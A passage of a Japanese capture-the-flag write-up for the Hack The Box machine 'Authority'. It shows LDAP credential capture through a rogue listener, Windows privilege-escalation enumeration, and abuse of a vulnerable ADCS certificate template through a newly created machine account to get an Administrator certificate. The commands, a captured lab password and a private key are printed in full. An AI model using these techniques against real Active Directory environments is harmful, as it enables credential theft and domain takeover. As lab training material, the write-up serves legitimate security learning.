ほう、ldapの設定箇所がある。こいつに自分のサーバーの設定を突っ込んでみる。
ncコマンドで通信を待ち受けていたら認証情報が飛んできました。
┌──(root㉿kali)-[~]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.20] from (UNKNOWN) [10.129.11.152] 51331
0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb lDaP_1n_th3_cle4r!
CNでアカウント名を確認するとsvc_ldap、その後にディレクトリツリーがあり、最後にパスワードらしき文字列が見えますね。
これでアクセスしてみる。
ログイン成功!User権限をいただきました!!!
特権昇格
情報収集
RustHound
BloodHoundの代わりにRustHoundを使います。DockerでBuildを済ませておけば特段Sharpなどのexeを手動で送りこむ必要もなくささっとzipファイルが手に入るのでお手軽です。
Buildする場合は以下のコマンドを実行しましょう。
※これはちょっと時間かかります。
┌──(root㉿kali)-[/opt/RustHound]
└─# docker build -t rusthound .
[+] Building 296.4s (11/11) FINISHED
=> [internal] load build definition from Dockerfile 0.1s
=> => transferring dockerfile: 368B 0.0s
=> [internal] load .dockerignore 0.1s
=> => transferring context: 2B 0.0s
=> [internal] load metadata for docker.io/library/rust:1.64-slim-buster 2.9s
=> [1/6] FROM docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 18.7s
=> => resolve docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 0.0s
=> => sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 194.36MB / 194.36MB 7.7s
=> => sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 984B / 984B 0.0s
=> => sha256:c761809aae5fe07769dab99f4404ca5d71a954934a74484e48eb06c0260ef484 742B / 742B 0.0s
=> => sha256:085572de3c6eef7d59c5fe4feb8263dffa0425acb73747606391b2a8afec2446 4.85kB / 4.85kB 0.0s
=> => sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 27.14MB / 27.14MB 1.3s
=> => extracting sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 3.2s
=> => extracting sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 10.7s
=> [internal] load build context 0.1s
=> => transferring context: 532.71kB 0.0s
=> [2/6] WORKDIR /usr/src/rusthound 1.6s
=> [3/6] RUN apt-get -y update && apt-get -y install gcc libclang-dev clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit m 28.6s
=> [4/6] COPY ./src/ ./src/ 0.1s
=> [5/6] COPY ./Cargo.toml ./Cargo.toml 0.1s
=> [6/6] RUN cargo install --path . 237.5s
=> exporting to image 6.9s
=> => exporting layers 6.9s
=> => writing image sha256:490ee8c18b28affff12ed0cb78992e21209368efd68a64772b027f2bf31f8bc8 0.0s
=> => naming to docker.io/library/rusthound
Buildが出来ていればDockerでRustHoundを回します。
┌──(root㉿kali)-[/opt/RustHound]
└─# docker run -v /opt/RustHound/work:/tmp/htb rusthound -d authority.htb -i 10.129.11.152 -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -o '/tmp/htb' -z --ldaps
---------------------------------------------------
Initializing RustHound at 06:48:59 on 07/18/23
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2023-07-18T06:48:59Z INFO rusthound] Verbosity level: Info
[2023-07-18T06:49:00Z INFO rusthound::ldap] Connected to AUTHORITY.HTB Active Directory!
[2023-07-18T06:49:00Z INFO rusthound::ldap] Starting data collection...
[2023-07-18T06:49:02Z INFO rusthound::ldap] All data collected for NamingContext DC=authority,DC=htb
[2023-07-18T06:49:02Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2023-07-18T06:49:02Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2023-07-18T06:49:02Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2023-07-18T06:49:02Z INFO rusthound::json::checker] Starting checker to replace some values...
[2023-07-18T06:49:02Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2023-07-18T06:49:02Z INFO rusthound::json::maker] 5 users parsed!
[2023-07-18T06:49:02Z INFO rusthound::json::maker] 60 groups parsed!
[2023-07-18T06:49:02Z INFO rusthound::json::maker] 1 computers parsed!
[2023-07-18T06:49:02Z INFO rusthound::json::maker] 3 ous parsed!
[2023-07-18T06:49:02Z INFO rusthound::json::maker] 1 domains parsed!
[2023-07-18T06:49:02Z INFO rusthound::json::maker] 3 gpos parsed!
[2023-07-18T06:49:02Z INFO rusthound::json::maker] 21 containers parsed!
RustHound Enumeration Completed at 06:49:02 on 07/18/23! Happy Graphing!
[2023-07-18T06:49:02Z INFO rusthound::json::maker] /tmp/htb/20230718064902_authority-htb_rusthound.zip created!
続いてneo4jとbloodhoundを起動します。
┌──(root㉿kali)-[~]
└─# neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2023-07-18 06:53:04.421+0000 INFO Starting...
2023-07-18 06:53:05.811+0000 INFO This instance is ServerId{1400abe5} (1400abe5-d8c9-4976-8194-b3706a4b1946)
2023-07-18 06:53:07.375+0000 INFO ======== Neo4j 4.4.16 ========
2023-07-18 06:53:09.318+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-07-18 06:53:09.332+0000 INFO Setting up initial user from defaults: neo4j
2023-07-18 06:53:09.335+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-07-18 06:53:09.346+0000 INFO Setting version for 'security-users' to 3
2023-07-18 06:53:09.349+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-07-18 06:53:09.352+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-07-18 06:53:09.751+0000 INFO Bolt enabled on localhost:7687.
2023-07-18 06:53:10.869+0000 INFO Remote interface available at http://localhost:7474/
2023-07-18 06:53:10.871+0000 INFO id: A26888B9358589A230ADB2D47824D1A3D2343840A955695BD6BE045BDCABB6D9
2023-07-18 06:53:10.872+0000 INFO name: system
2023-07-18 06:53:10.872+0000 INFO creationDate: 2023-07-18T06:53:08.125Z
2023-07-18 06:53:10.872+0000 INFO Started.
┌──(root㉿kali)-[~]
└─# bloodhound
(node:33662) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
(node:33731) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
出来たZIPを投入して確認します。
何もいいのがなかったです。
winPeas
以下からwinPeasのbatファイルをダウンロードし、対象端末上で実行する。
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload winPEAS.bat
Info: Uploading /root/work/winPEAS.bat to C:\Users\svc_ldap\Desktop\winPEAS.bat
Data: 47928 bytes of 47928 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\winPEAS.bat
((,.,/((((((((((((((((((((/, */
,/*,..*(((((((((((((((((((((((((((((((((,
,*/((((((((((((((((((/, .*//((//**, .*((((((*
((((((((((((((((* *****,,,/########## .(* ,((((((
(((((((((((/* ******************/####### .(. ((((((
((((((..******************/@@@@@/***/###### /((((((
,,..**********************@@@@@@@@@@(***,#### ../(((((
, ,**********************#@@@@@#@@@@*********##((/ /((((
..(((##########*********/#@@@@@@@@@/*************,,..((((
.(((################(/******/@@@@@#****************.. /((
.((########################(/************************..*(
.((#############################(/********************.,(
.((##################################(/***************..(
.((######################################(************..(
.((######(,.***.,(###################(..***(/*********..(
.((######*(#####((##################((######/(********..(
.((##################(/**********(################(**...(
.(((####################/*******(###################.((((
.(((((############################################/ /((
..(((((#########################################(..(((((.
....(((((#####################################( .((((((.
......(((((#################################( .(((((((.
(((((((((. ,(############################(../(((((((((.
(((((((((/, ,####################(/..((((((((((.
(((((((((/,. ,*//////*,. ./(((((((((((.
(((((((((((((((((((((((((((/
by carlospolop
/!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script
WinPEAS should be used for authorized penetration testing and/or educational purposes only.
Any misuse of this software will not be the responsibility of the author or of any other collaborator.
Use it at your own networks and/or with the network owner's permission.
...省略
特段いいものがない。
Powerless
以下サイトからPoweless.batをダウンロードする。
また、多くのアクセス権の情報を出力させるためAccessChk.exeを以下からダウンロードします。
回します。
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload accesschk64.exe
Info: Uploading /root/work/accesschk64.exe to C:\Users\svc_ldap\Desktop\accesschk64.exe
Data: 1080552 bytes of 1080552 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload Powerless.bat
Info: Uploading /root/work/Powerless.bat to C:\Users\svc_ldap\Desktop\Powerless.bat
Data: 16896 bytes of 16896 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\Powerless.bat
------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
Powerless.bat : Access is denied.
+ CategoryInfo : NotSpecified: (Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
----- Architecture -------
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=5507
------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
Current User: svc_ldap
USER INFORMATION
----------------
User Name SID
============ =============================================
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601
...省略
特段いいものがない。
PowerUp
以下のリポジトリからダウンロード。回してみる。
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Import-Module C:\Users\svc_ldap\Desktop\PowerUp.ps1
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
Access denied
At C:\Users\svc_ldap\Desktop\PowerUp.ps1:457 char:21
+ $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
[*] Checking service executable and argument permissions...
Access denied
At C:\Users\svc_ldap\Desktop\PowerUp.ps1:488 char:5
+ Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
[*] Checking service permissions...
Access denied
At C:\Users\svc_ldap\Desktop\PowerUp.ps1:534 char:17
+ $Services = Get-WmiObject -Class win32_service | Where-Object {$_ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
[*] Checking %PATH% for potentially hijackable .dll locations...
HijackablePath : C:\Users\svc_ldap\AppData\Local\Microsoft\WindowsApps\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\svc_ldap\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...'
HijackablePathが出てくるけど、WindowsAppsって大体どのBOXでも出てくるんだよねという感覚。
特段いいものはなさそう。
SharpUp.exe
上記から一通りのバイナリはどうせこの後試すだろうから落としておきましょう。
その中からSharpUp.exeを利用します。auditコマンドを使い、全モジュールで検査。
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\SharpUp.exe audit
=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
[X] Unhandled exception in ModifiableServiceRegistryKeys: Exception has been thrown by the target of an invocation.
[X] Unhandled exception in ModifiableServices: Exception has been thrown by the target of an invocation.
[-] Not vulnerable to any of the 15 checked modules.
[*] Completed Privesc Checks in 5 seconds
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop>
特段いいものがなさそう。
手動 enumerate
cmdkey
*Evil-WinRM* PS C:\> cmdkey /list
Currently stored credentials:
* NONE *
*Evil-WinRM* PS C:\>
クレデンシャルなし
whoami /priv
*Evil-WinRM* PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\>
ワクスペはまぁ追加できそうですね。
ps
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
397 33 12568 21088 2152 0 certsrv
159 9 6680 552 2444 0 conhost
507 19 2244 5460 364 0 csrss
171 9 1732 4788 476 1 csrss
407 34 17236 24148 2528 0 dfsrs
162 9 2000 6224 2932 0 dfssvc
291 14 3916 13664 3960 0 dllhost
10408 7405 130960 129320 2564 0 dns
532 22 23148 42264 992 1 dwm
54 6 1600 4212 2944 1 fontdrvhost
54 6 1512 4020 2952 0 fontdrvhost
0 0 56 8 0 0 Idle
206 16 6516 15572 2596 0 inetinfo
140 12 1908 5824 2104 0 ismserv
870 35 957656 923320 3808 0 javaw
474 26 10736 47344 4748 1 LogonUI
2091 171 66604 73928 616 0 lsass
558 58 50148 77204 2224 0 Microsoft.ActiveDirectory.WebServices
255 13 3284 10608 4244 0 msdtc
135 8 1876 6784 2668 0 nssm
517 54 73340 11404 2036 0 powershell
0 8 336 100692 88 0 Registry
642 36 17084 24008 1148 0 SearchIndexer
605 14 5708 13544 608 0 services
53 3 496 1068 272 0 smss
497 26 6176 18816 3032 0 spoolsv
189 11 1864 8400 296 0 svchost
133 16 3952 8188 316 0 svchost
210 12 1740 7468 360 0 svchost
143 7 1408 6092 632 0 svchost
90 5 932 3860 832 0 svchost
746 16 5280 15136 852 0 svchost
756 19 6044 12544 888 0 svchost
241 10 1804 7068 936 0 svchost
270 15 4244 9848 1032 0 svchost
221 9 2140 7768 1128 0 svchost
351 13 10448 15048 1164 0 svchost
403 33 7068 16468 1272 0 svchost
250 15 2988 12200 1332 0 svchost
376 17 5340 13836 1340 0 svchost
236 12 2688 11916 1348 0 svchost
437 9 2768 9104 1360 0 svchost
122 7 1244 5676 1384 0 svchost
163 10 1720 8164 1484 0 svchost
327 10 2564 8712 1528 0 svchost
373 18 5164 14840 1536 0 svchost
322 12 2144 9152 1588 0 svchost
181 11 1928 8288 1668 0 svchost
144 9 1596 6660 1752 0 svchost
173 9 2152 7488 1784 0 svchost
269 14 2576 8084 1840 0 svchost
169 13 1780 7552 1856 0 svchost
265 13 3724 11360 1892 0 svchost
223 12 2216 9444 1904 0 svchost
423 16 13100 21728 1944 0 svchost
233 12 2696 12676 2028 0 svchost
179 10 1808 8204 2080 0 svchost
457 15 3008 11156 2112 0 svchost
239 25 3856 13148 2164 0 svchost
190 15 6080 10440 2204 0 svchost
131 7 1300 5824 2240 0 svchost
317 16 16124 18136 2276 0 svchost
458 20 18100 31220 2460 0 svchost
210 11 2276 8704 2724 0 svchost
139 9 1592 6632 2744 0 svchost
141 8 1520 6356 2900 0 svchost
171 12 3888 11036 3068 0 svchost
234 15 4708 12056 3084 0 svchost
278 20 3944 13192 3124 0 svchost
171 11 2188 13244 3144 0 svchost
224 12 2144 7688 3196 0 svchost
322 18 6052 22756 3464 0 svchost
130 8 2840 10224 3796 0 svchost
317 21 8864 15996 4636 0 svchost
408 26 3544 13356 4684 0 svchost
173 11 2356 13352 4740 0 svchost
161 10 1984 7016 5088 0 svchost
167 9 2652 7556 5940 0 svchost
1483 0 192 156 4 0 System
214 16 2408 10660 3680 0 vds
177 11 3244 11944 3112 0 VGAuthService
151 8 1676 7300 604 0 vm3dservice
140 9 1704 7672 2592 1 vm3dservice
144 10 1784 7696 3456 1 vm3dservice
404 23 10152 23436 3104 0 vmtoolsd
173 11 1416 6992 468 0 wininit
247 12 2584 18440 536 1 winlogon
394 20 22392 33300 3848 0 WmiPrvSE
699 27 54204 73672 2.80 2172 0 wsmprovhost
Active Directory証明書サービス(ADCS)が動いている!
EscapeのBOXでも見たサービスですね。
Certify.exe
脆弱な証明書テンプレートがあるか確認します。
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload Certify.exe
Info: Uploading /root/work/Certify.exe to C:\Users\svc_ldap\Desktop\Certify.exe
Data: 232104 bytes of 232104 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |'
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=authority,DC=htb'
[*] Listing info about the Enterprise CA 'AUTHORITY-CA'
Enterprise CA Name : AUTHORITY-CA
DNS Hostname : authority.authority.htb
FullName : authority.authority.htb\AUTHORITY-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=AUTHORITY-CA, DC=authority, DC=htb
Cert Thumbprint : 42A80DC79DD9CE76D032080B2F8B172BC29B0182
Cert Serial : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Cert Start Date : 4/23/2023 9:46:26 PM
Cert End Date : 4/23/2123 9:56:25 PM
Cert Chain : CN=AUTHORITY-CA,DC=authority,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
Allow ManageCA, ManageCertificates HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : authority.authority.htb\AUTHORITY-CA
Template Name : CorpVPN
Schema Version : 2
Validity Period : 20 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
mspki-certificate-application-policy : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Domain Computers S-1-5-21-622327497-3269355298-2248959698-515
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Object Control Permissions
Owner : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
WriteOwner Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteDacl Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteProperty Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
脆弱なテンプレートの見方は以下のサイトにわかりやすくまとまっています。
今回この脆弱なテンプレートを利用できるのはDomain Computersみたいです。
実際にsvc_ldapでテンプレートを要求しても以下のようにエラーが発生する。
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\Certify.exe request /ca:authority.authority.htb\AUTHORITY-CA /template:CorpVPN /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : HTB\svc_ldap
[*] No subject name specified, using current context as subject.
[*] Template : CorpVPN
[*] Subject : CN=svc_ldap, OU=Service Accounts, OU=CORP, DC=authority, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : authority.authority.htb\AUTHORITY-CA
[!] CA Response : The submission failed: Denied by Policy Module
[!] Last status : 0x80094012. Message: The permissions on the certificate template do not allow the current user to enroll for this type of certificate. (Exception from HRESULT: 0x80094012)
[*] Request ID : 3
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA5+XrfwHZXEwcIHZpjAbLu7R6x/TmlcigFIscS/UF4Khk58hG
df63QTx0cvBU30F7PTNAffwrQjhdjRsqFgBCKAitEw8au6TwINhke9ZnhPlbaOD5
4N5PfAjJK52Pbc+LZs8d4utX9N2m7ccWLogt/gqOLJEif+7k6BVFqmiqU1kQoLea
ih2c710RhWslPRYgsOK9aS+Mb1CD9N9S1XgUGrk0XylfaUPiaYi3CoZDemXxw7PS
aO5ZXj8KpMp4bom6WA0XetHNwrHHWSvQ+jyTYDdVTnzif4uM5IPV//0LbDOtCDuw
noaiXCfJCw/nfoGInV2sp9hRooD16BkTNiyI6QIDAQABAoIBAEFxel8yZ2QLuphS
soCo3lAPo+LQM06r+rkxdP/emxUGkMt0kqX0B0VqyTYyqtECisP/tcCYLKEYhRYw
R1VEJ2di420QgyvXZUjvqJPmMvqs4GYdr4cNVgMb+6HKalLEEoQmCTojzoO1Fcne
uFzTY59g3TSolMLj6Uex0SJBPWgdnfTG/+xz0++A9HauQTuDvVwCl+n2pabjIOLz
ut7NVbSPm63L/Lpkys3shNPRYEIwYh2pNNi1ZXdKSjWMSBuIuohLFe53YuP7nG0E
7xUIZXsMExf36gYhyGjckfsZGOIBL+FYrySrz6K5FtwG9DVw1Krd/SeRERG0VzJ1
ys0Qui0CgYEA8tRwXXbqJ6ludQw3lw+Pksq+tymQ7bC2QxnALLaMVrNl/MGQhcYD
0TO5cAfckPeey4lznSg8DL8YeeK4BIm93+hSCCWqndGmyS7Cix7Lu/N8pECtv0Y9
uXQhaOn7tubt5XpSAu0hjKBr8x3gCmI//1Gos0TW775W+f4C/UNo9R8CgYEA9Hmz
NP/FV8zDsF5r/RuBFq9XsjHact+I4qKcoBJSepd9StYBkXntCu4XjDawyHvD5HAa
m3XKFy8F/UO0nJAWjitGidKtjm7UCT55/fp0AQ3WahLgArWXGINuRtUZ2AcswWpG
2myMJ8oJMCwHwuqpPGVm0wYnLMjHmXZGIFFO+PcCgYBMA0olR8smnTgRdcCVDe7w
kXy/00glz5JOUOpCVOZ7YW8EfwchiQm63AkpU5ys2IahyiYhxO1/Q/aCeQEHkqKY
S54aJMhS3MTr5zJI4FwAOskClaiN3owF2J94uv3rlEBV/ENd3SMKZVFFak2uknDc
GJDJhTwPEjMh0GzZINfjGwKBgQDeqgFoohPxNdR9zGH6s5RNPwJWkEVwHtwj3wtc
V5O7iEJbaLMg9rXJILVdxWoaD2+Jnfj94rhfiTqhQ4s6lZmVfyDN4o6kjZidmsOt
aPFDDIFfNzXEAfROJVbJOMpDEbXXq55AzmCQ1NitgUzIYMYm9gxC4vXHOk9hHHIe
eS++XQKBgQChoNM8JqM5aPkRLOgeCfdRrm1WB/jwBLkiBoKvw4BmKGED79Qiuksm
mZUAwHSABe08W12XozCFASnKxbRbxWBlMo7vIrXmplRABI89xpCfk9Pc5YeA63YM
F2+wKWja3MvrM95A3ZFeMav8UCCGOF9kQHhO4f8Um4Q9MjMsvlbTvw==
-----END RSA PRIVATE KEY-----
[X] Error downloading certificate: Cert not yet issued yet! (iDisposition: 2)
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Attack to ADCS
Domain Computerなら脆弱なテンプレートを利用できるので、新規でComputerを作ってしまおうと考えます。
Add New Computer
作成をやり易くするために以下のPowershellをImportしておきましょう。
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Import-Module C:\Users\svc_ldap\Desktop\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Import-Module C:\Users\svc_ldap\Desktop\Powermad.ps1
これで以下の作成コマンドを実行します。Passwordは123456とか適当に設定しときます。
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> New-MachineAccount -MachineAccount TEST -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Domain authority.htb -DomainController authority.authority.htb -Verbose
Certipy
上記で作成したComputerのTEST$としてログインし、証明書テンプレートを要求しないといけないので、一括でできるCertipyを実行します。以下のリポジトリを参考にして欲しい。
回してみると以下のエラーが出る。
┌──(root㉿kali)-[~/work]
└─# certipy req -username TEST@authority.htb -password 123456 -ca AUTHORITY-CA -dc-ip 10.129.11.152 -template CorpVPN -upn Administrator@AUTHORITY.HTB -debug -target authority.authority.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.11.152[\pipe\cert]
[!] Failed to connect to endpoint ncacn_np:10.129.11.152[\pipe\cert]: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.11.152[49722]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.11.152[49722]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.11.152[49722]
[-] Got error: Unknown DCE RPC fault status code: 00000721
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/certipy/entry.py", line 60, in main
actions[options.action](options)
File "/usr/local/lib/python3.11/dist-packages/certipy/commands/parsers/req.py", line 12, in entry
req.entry(options)
File "/usr/local/lib/python3.11/dist-packages/certipy/commands/req.py", line 767, in entry
request.request()
File "/usr/local/lib/python3.11/dist-packages/certipy/commands/req.py", line 718, in request
cert = self.interface.request(csr, attributes)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/certipy/commands/req.py", line 208, in request
response = self.dce.request(request)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 859, in request
answer = self.recv()
^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1332, in recv
raise DCERPCException('Unknown DCE RPC fault status code: %.8x' % status_code)
impacket.dcerpc.v5.rpcrt.DCERPCException: Unknown DCE RPC fault status code: 00000721
DCとのやり取りで時刻同期ズレのエラーが発生するのようなのでntpdateを使って解消するようにしましょう。
┌──(root㉿kali)-[~/work]
└─# ntpdate 10.129.11.152
2023-07-19 02:48:28.172973 (-0400) +14391.840508 +/- 0.138896 10.129.11.152 s1 no-leap
CLOCK: time stepped by 14391.840508
┌──(root㉿kali)-[~/work]
└─# certipy req -username TEST$@AUTHORITY.HTB -password 123456 -ca AUTHORITY-CA -dc-ip 10.129.11.152 -template CorpVPN -upn Administrator@AUTHORITY.HTB -debug -target authority.authority.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'authority.authority.htb' at '10.129.11.152'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.11.152[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.11.152[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Administrator@AUTHORITY.HTB'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
administrator.pfxが作成されたので、此奴でKerberousさんに認証要求します。
┌──(root㉿kali)-[~/work]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.11.152
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
ダメと言われます。
えぇ...明らかこの前のEscapeより難しいぞ。
PassTheCert
Exploit考察
Smart Card Logonを利用するExtended Key Usagesが証明書に含まれてない場合、上記のKDC_ERR_PADATA_TYPE_NOSUPPエラーになることがあるようです。このような状況では証明書を使ったKerberos認証での権限昇格は出来ません。
